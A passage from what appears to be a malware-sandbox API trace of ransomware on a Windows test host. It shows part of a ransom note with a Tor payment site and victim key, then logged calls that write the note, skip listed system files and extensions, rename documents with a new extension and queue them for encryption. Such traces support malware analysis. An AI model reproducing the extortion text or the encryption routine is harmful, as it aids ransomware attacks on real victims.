do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.626] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.627] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e3bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e3bc*=0x7ca, lpOverlapped=0x0) returned 1 [0158.628] CloseHandle (hObject=0x1a4) returned 1 [0158.628] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue")) returned 0x10 [0158.628] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\") returned="" [0158.628] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\") returned 0x55 [0158.628] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\*", fInfoLevelId=0x0, lpFindFileData=0x32e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e61c) returned 0x154208 [0158.628] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a70a1a0, ftCreationTime.dwHighDateTime=0x1d5d914, ftLastAccessTime.dwLowDateTime=0x8c3ebfe0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c3ebfe0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.629] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5868df0, ftCreationTime.dwHighDateTime=0x1d5e1d0, ftLastAccessTime.dwLowDateTime=0x663eeaa0, ftLastAccessTime.dwHighDateTime=0x1d5e563, ftLastWriteTime.dwLowDateTime=0x663eeaa0, ftLastWriteTime.dwHighDateTime=0x1d5e563, nFileSizeHigh=0x0, nFileSizeLow=0xc8bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="8pIMNpwy.ppt", cAlternateFileName="")) returned 1 [0158.629] _wcsicmp (_Str1="8pIMNpwy.ppt", _Str2="README.c06622a1.TXT") returned -58 [0158.629] wcsstr (_Str="8pIMNpwy.ppt", _SubStr="README") returned 0x0 [0158.630] _wcsicmp (_Str1="autorun.inf", _Str2="8pIMNpwy.ppt") returned 41 [0158.630] wcslen (_String="autorun.inf") returned 0xb [0158.630] _wcsicmp (_Str1="boot.ini", _Str2="8pIMNpwy.ppt") returned 42 [0158.630] wcslen (_String="boot.ini") returned 0x8 [0158.630] _wcsicmp (_Str1="bootfont.bin", _Str2="8pIMNpwy.ppt") returned 42 [0158.630] wcslen (_String="bootfont.bin") returned 0xc [0158.630] _wcsicmp (_Str1="bootsect.bak", _Str2="8pIMNpwy.ppt") returned 42 [0158.630] wcslen (_String="bootsect.bak") returned 0xc [0158.630] _wcsicmp (_Str1="desktop.ini", _Str2="8pIMNpwy.ppt") returned 44 [0158.630] wcslen (_String="desktop.ini") returned 0xb [0158.630] _wcsicmp (_Str1="iconcache.db", _Str2="8pIMNpwy.ppt") returned 49 [0158.630] wcslen (_String="iconcache.db") returned 0xc [0158.630] _wcsicmp (_Str1="ntldr", _Str2="8pIMNpwy.ppt") returned 54 [0158.630] wcslen (_String="ntldr") returned 0x5 [0158.630] _wcsicmp (_Str1="ntuser.dat", _Str2="8pIMNpwy.ppt") returned 54 [0158.630] wcslen (_String="ntuser.dat") returned 0xa [0158.630] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8pIMNpwy.ppt") returned 54 [0158.630] wcslen (_String="ntuser.dat.log") returned 0xe [0158.630] _wcsicmp (_Str1="ntuser.ini", _Str2="8pIMNpwy.ppt") returned 54 [0158.630] wcslen (_String="ntuser.ini") returned 0xa [0158.630] _wcsicmp (_Str1="thumbs.db", _Str2="8pIMNpwy.ppt") returned 60 [0158.630] wcslen (_String="thumbs.db") returned 0x9 [0158.630] _wcsicmp (_Str1="386", _Str2="ppt") returned -61 [0158.630] wcslen (_String="386") returned 0x3 [0158.630] _wcsicmp (_Str1="adv", _Str2="ppt") returned -15 [0158.630] wcslen (_String="adv") returned 0x3 [0158.630] _wcsicmp (_Str1="ani", _Str2="ppt") returned -15 [0158.630] wcslen (_String="ani") returned 0x3 [0158.630] _wcsicmp (_Str1="bat", _Str2="ppt") returned -14 [0158.631] wcslen (_String="bat") returned 0x3 [0158.631] _wcsicmp (_Str1="bin", _Str2="ppt") returned -14 [0158.631] wcslen (_String="bin") returned 0x3 [0158.631] _wcsicmp (_Str1="cab", _Str2="ppt") returned -13 [0158.631] wcslen (_String="cab") returned 0x3 [0158.631] _wcsicmp (_Str1="cmd", _Str2="ppt") returned -13 [0158.631] wcslen (_String="cmd") returned 0x3 [0158.631] _wcsicmp (_Str1="com", _Str2="ppt") returned -13 [0158.631] wcslen (_String="com") returned 0x3 [0158.631] _wcsicmp (_Str1="cpl", _Str2="ppt") returned -13 [0158.631] wcslen (_String="cpl") returned 0x3 [0158.631] _wcsicmp (_Str1="cur", _Str2="ppt") returned -13 [0158.631] wcslen (_String="cur") returned 0x3 [0158.631] _wcsicmp (_Str1="deskthemepack", _Str2="ppt") returned -12 [0158.631] wcslen (_String="deskthemepack") returned 0xd [0158.631] _wcsicmp (_Str1="diagcab", _Str2="ppt") returned -12 [0158.631] wcslen (_String="diagcab") returned 0x7 [0158.631] _wcsicmp (_Str1="diagcfg", _Str2="ppt") returned -12 [0158.631] wcslen (_String="diagcfg") returned 0x7 [0158.631] _wcsicmp (_Str1="diagpkg", _Str2="ppt") returned -12 [0158.631] wcslen (_String="diagpkg") returned 0x7 [0158.631] _wcsicmp (_Str1="dll", _Str2="ppt") returned -12 [0158.631] wcslen (_String="dll") returned 0x3 [0158.631] _wcsicmp (_Str1="drv", _Str2="ppt") returned -12 [0158.631] wcslen (_String="drv") returned 0x3 [0158.631] _wcsicmp (_Str1="exe", _Str2="ppt") returned -11 [0158.632] wcslen (_String="exe") returned 0x3 [0158.632] _wcsicmp (_Str1="hlp", _Str2="ppt") returned -8 [0158.632] wcslen (_String="hlp") returned 0x3 [0158.632] _wcsicmp (_Str1="icl", _Str2="ppt") returned -7 [0158.632] wcslen (_String="icl") returned 0x3 [0158.632] _wcsicmp (_Str1="icns", _Str2="ppt") returned -7 [0158.632] wcslen (_String="icns") returned 0x4 [0158.632] _wcsicmp (_Str1="ico", _Str2="ppt") returned -7 [0158.632] wcslen (_String="ico") returned 0x3 [0158.632] _wcsicmp (_Str1="ics", _Str2="ppt") returned -7 [0158.632] wcslen (_String="ics") returned 0x3 [0158.632] _wcsicmp (_Str1="idx", _Str2="ppt") returned -7 [0158.632] wcslen (_String="idx") returned 0x3 [0158.632] _wcsicmp (_Str1="ldf", _Str2="ppt") returned -4 [0158.632] wcslen (_String="ldf") returned 0x3 [0158.632] _wcsicmp (_Str1="lnk", _Str2="ppt") returned -4 [0158.632] wcslen (_String="lnk") returned 0x3 [0158.632] _wcsicmp (_Str1="mod", _Str2="ppt") returned -3 [0158.632] wcslen (_String="mod") returned 0x3 [0158.632] _wcsicmp (_Str1="mpa", _Str2="ppt") returned -3 [0158.632] wcslen (_String="mpa") returned 0x3 [0158.632] _wcsicmp (_Str1="msc", _Str2="ppt") returned -3 [0158.632] wcslen (_String="msc") returned 0x3 [0158.632] _wcsicmp (_Str1="msp", _Str2="ppt") returned -3 [0158.632] wcslen (_String="msp") returned 0x3 [0158.632] _wcsicmp (_Str1="msstyles", _Str2="ppt") returned -3 [0158.632] wcslen (_String="msstyles") returned 0x8 [0158.632] _wcsicmp (_Str1="msu", _Str2="ppt") returned -3 [0158.632] wcslen (_String="msu") returned 0x3 [0158.632] _wcsicmp (_Str1="nls", _Str2="ppt") returned -2 [0158.632] wcslen (_String="nls") returned 0x3 [0158.632] _wcsicmp (_Str1="nomedia", _Str2="ppt") returned -2 [0158.632] wcslen (_String="nomedia") returned 0x7 [0158.632] _wcsicmp (_Str1="ocx", _Str2="ppt") returned -1 [0158.633] wcslen (_String="ocx") returned 0x3 [0158.633] _wcsicmp (_Str1="prf", _Str2="ppt") returned 2 [0158.633] wcslen (_String="prf") returned 0x3 [0158.633] _wcsicmp (_Str1="ps1", _Str2="ppt") returned 3 [0158.633] wcslen (_String="ps1") returned 0x3 [0158.633] _wcsicmp (_Str1="rom", _Str2="ppt") returned 2 [0158.633] wcslen (_String="rom") returned 0x3 [0158.633] _wcsicmp (_Str1="rtp", _Str2="ppt") returned 2 [0158.633] wcslen (_String="rtp") returned 0x3 [0158.633] _wcsicmp (_Str1="scr", _Str2="ppt") returned 3 [0158.633] wcslen (_String="scr") returned 0x3 [0158.633] _wcsicmp (_Str1="shs", _Str2="ppt") returned 3 [0158.633] wcslen (_String="shs") returned 0x3 [0158.633] _wcsicmp (_Str1="spl", _Str2="ppt") returned 3 [0158.633] wcslen (_String="spl") returned 0x3 [0158.633] _wcsicmp (_Str1="sys", _Str2="ppt") returned 3 [0158.633] wcslen (_String="sys") returned 0x3 [0158.633] _wcsicmp (_Str1="theme", _Str2="ppt") returned 4 [0158.633] wcslen (_String="theme") returned 0x5 [0158.633] _wcsicmp (_Str1="themepack", _Str2="ppt") returned 4 [0158.633] wcslen (_String="themepack") returned 0x9 [0158.633] _wcsicmp (_Str1="wpx", _Str2="ppt") returned 7 [0158.633] wcslen (_String="wpx") returned 0x3 [0158.633] _wcsicmp (_Str1="lock", _Str2="ppt") returned -4 [0158.633] wcslen (_String="lock") returned 0x4 [0158.633] _wcsicmp (_Str1="key", _Str2="ppt") returned -5 [0158.633] wcslen (_String="key") returned 0x3 [0158.633] _wcsicmp (_Str1="hta", _Str2="ppt") returned -8 [0158.633] wcslen (_String="hta") returned 0x3 [0158.633] _wcsicmp (_Str1="msi", _Str2="ppt") returned -3 [0158.633] wcslen (_String="msi") returned 0x3 [0158.633] _wcsicmp (_Str1="pdb", _Str2="ppt") returned -12 [0158.633] wcslen (_String="pdb") returned 0x3 [0158.633] _wcsicmp (_Str1="sqlite", _Str2="ppt") returned 3 [0158.633] wcslen (_String="sqlite") returned 0x6 [0158.634] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue")) returned 0x10 [0158.634] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.634] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" [0158.634] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned 0x54 [0158.634] wcscpy (in: _Dest=0x32a013a, _Source="8pIMNpwy.ppt" | out: _Dest="8pIMNpwy.ppt") returned="8pIMNpwy.ppt" [0158.634] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt", dwFileAttributes=0x80) returned 1 [0158.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\8pimnpwy.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0158.635] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.635] ReadFile (in: hFile=0x1c8, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.635] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x5e50cc02 [0158.635] RtlComputeCrc32 (PartialCrc=0xcc02, Buffer=0x32e4a4, Length=0x80) returned 0xebfc7671 [0158.635] RtlComputeCrc32 (PartialCrc=0x7671, Buffer=0x32e4a4, Length=0x80) returned 0x23232ef3 [0158.636] RtlComputeCrc32 (PartialCrc=0x2ef3, Buffer=0x32e4a4, Length=0x80) returned 0x1f485309 [0158.636] RtlComputeCrc32 (PartialCrc=0x5309, Buffer=0x32e4a4, Length=0x80) returned 0xf883842d [0158.636] CloseHandle (hObject=0x1c8) returned 1 [0158.636] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.636] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt" [0158.636] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt") returned 0x61 [0158.636] wcscpy (in: _Dest=0x32b015a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.636] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\8pimnpwy.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\8pimnpwy.ppt.c06622a1"), dwFlags=0x8) returned 1 [0158.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\8pIMNpwy.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\8pimnpwy.ppt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0158.641] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.641] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0158.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6689c86b [0158.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x32282c0c [0158.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4970fc79 [0158.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2411be83 [0158.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78a4d3f7 [0158.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d2d34b8 [0158.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3743b8f7 [0158.651] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x399b0467 [0158.654] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x775ba748 [0158.654] RtlComputeCrc32 (PartialCrc=0xa748, Buffer=0x3510094, Length=0x80) returned 0xa36badf3 [0158.654] RtlComputeCrc32 (PartialCrc=0xadf3, Buffer=0x3510094, Length=0x80) returned 0x4b1ca895 [0158.654] RtlComputeCrc32 (PartialCrc=0xa895, Buffer=0x3510094, Length=0x80) returned 0x606cda24 [0158.654] RtlComputeCrc32 (PartialCrc=0xda24, Buffer=0x3510094, Length=0x80) returned 0x94cceae2 [0158.654] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0158.655] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.655] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.655] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a670fd0, ftCreationTime.dwHighDateTime=0x1d5e6a3, ftLastAccessTime.dwLowDateTime=0x752d360, ftLastAccessTime.dwHighDateTime=0x1d5e4c0, ftLastWriteTime.dwLowDateTime=0x752d360, ftLastWriteTime.dwHighDateTime=0x1d5e4c0, nFileSizeHigh=0x0, nFileSizeLow=0x2f25, dwReserved0=0x0, dwReserved1=0x0, cFileName="BSAiBEBUj.pdf", cAlternateFileName="BSAIBE~1.PDF")) returned 1 [0158.655] _wcsicmp (_Str1="BSAiBEBUj.pdf", _Str2="README.c06622a1.TXT") returned -16 [0158.655] wcsstr (_Str="BSAiBEBUj.pdf", _SubStr="README") returned 0x0 [0158.655] _wcsicmp (_Str1="autorun.inf", _Str2="BSAiBEBUj.pdf") returned -1 [0158.655] wcslen (_String="autorun.inf") returned 0xb [0158.655] _wcsicmp (_Str1="boot.ini", _Str2="BSAiBEBUj.pdf") returned -4 [0158.655] wcslen (_String="boot.ini") returned 0x8 [0158.655] _wcsicmp (_Str1="bootfont.bin", _Str2="BSAiBEBUj.pdf") returned -4 [0158.655] wcslen (_String="bootfont.bin") returned 0xc [0158.655] _wcsicmp (_Str1="bootsect.bak", _Str2="BSAiBEBUj.pdf") returned -4 [0158.655] wcslen (_String="bootsect.bak") returned 0xc [0158.655] _wcsicmp (_Str1="desktop.ini", _Str2="BSAiBEBUj.pdf") returned 2 [0158.655] wcslen (_String="desktop.ini") returned 0xb [0158.655] _wcsicmp (_Str1="iconcache.db", _Str2="BSAiBEBUj.pdf") returned 7 [0158.655] wcslen (_String="iconcache.db") returned 0xc [0158.655] _wcsicmp (_Str1="ntldr", _Str2="BSAiBEBUj.pdf") returned 12 [0158.655] wcslen (_String="ntldr") returned 0x5 [0158.655] _wcsicmp (_Str1="ntuser.dat", _Str2="BSAiBEBUj.pdf") returned 12 [0158.655] wcslen (_String="ntuser.dat") returned 0xa [0158.655] _wcsicmp (_Str1="ntuser.dat.log", _Str2="BSAiBEBUj.pdf") returned 12 [0158.655] wcslen (_String="ntuser.dat.log") returned 0xe [0158.655] _wcsicmp (_Str1="ntuser.ini", _Str2="BSAiBEBUj.pdf") returned 12 [0158.655] wcslen (_String="ntuser.ini") returned 0xa [0158.655] _wcsicmp (_Str1="thumbs.db", _Str2="BSAiBEBUj.pdf") returned 18 [0158.655] wcslen (_String="thumbs.db") returned 0x9 [0158.655] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0158.656] wcslen (_String="386") returned 0x3 [0158.656] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0158.656] wcslen (_String="adv") returned 0x3 [0158.656] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0158.656] wcslen (_String="ani") returned 0x3 [0158.656] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0158.656] wcslen (_String="bat") returned 0x3 [0158.656] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0158.656] wcslen (_String="bin") returned 0x3 [0158.656] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0158.656] wcslen (_String="cab") returned 0x3 [0158.656] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0158.656] wcslen (_String="cmd") returned 0x3 [0158.656] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0158.656] wcslen (_String="com") returned 0x3 [0158.656] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0158.656] wcslen (_String="cpl") returned 0x3 [0158.656] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0158.656] wcslen (_String="cur") returned 0x3 [0158.656] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0158.656] wcslen (_String="deskthemepack") returned 0xd [0158.656] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0158.656] wcslen (_String="diagcab") returned 0x7 [0158.656] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0158.656] wcslen (_String="diagcfg") returned 0x7 [0158.656] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0158.656] wcslen (_String="diagpkg") returned 0x7 [0158.656] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0158.656] wcslen (_String="dll") returned 0x3 [0158.656] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0158.657] wcslen (_String="drv") returned 0x3 [0158.657] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0158.657] wcslen (_String="exe") returned 0x3 [0158.657] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0158.657] wcslen (_String="hlp") returned 0x3 [0158.657] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0158.657] wcslen (_String="icl") returned 0x3 [0158.657] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0158.657] wcslen (_String="icns") returned 0x4 [0158.657] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0158.657] wcslen (_String="ico") returned 0x3 [0158.657] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0158.657] wcslen (_String="ics") returned 0x3 [0158.657] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0158.657] wcslen (_String="idx") returned 0x3 [0158.657] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0158.657] wcslen (_String="ldf") returned 0x3 [0158.657] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0158.657] wcslen (_String="lnk") returned 0x3 [0158.657] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0158.657] wcslen (_String="mod") returned 0x3 [0158.657] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0158.657] wcslen (_String="mpa") returned 0x3 [0158.657] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0158.657] wcslen (_String="msc") returned 0x3 [0158.657] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0158.657] wcslen (_String="msp") returned 0x3 [0158.657] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0158.658] wcslen (_String="msstyles") returned 0x8 [0158.658] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0158.658] wcslen (_String="msu") returned 0x3 [0158.658] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0158.658] wcslen (_String="nls") returned 0x3 [0158.658] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0158.658] wcslen (_String="nomedia") returned 0x7 [0158.658] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0158.658] wcslen (_String="ocx") returned 0x3 [0158.658] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0158.658] wcslen (_String="prf") returned 0x3 [0158.658] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0158.658] wcslen (_String="ps1") returned 0x3 [0158.658] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0158.658] wcslen (_String="rom") returned 0x3 [0158.658] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0158.658] wcslen (_String="rtp") returned 0x3 [0158.658] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0158.658] wcslen (_String="scr") returned 0x3 [0158.658] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0158.658] wcslen (_String="shs") returned 0x3 [0158.658] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0158.658] wcslen (_String="spl") returned 0x3 [0158.658] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0158.658] wcslen (_String="sys") returned 0x3 [0158.658] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0158.658] wcslen (_String="theme") returned 0x5 [0158.658] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0158.658] wcslen (_String="themepack") returned 0x9 [0158.659] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0158.659] wcslen (_String="wpx") returned 0x3 [0158.659] _wcsicmp (_Str1="lock", 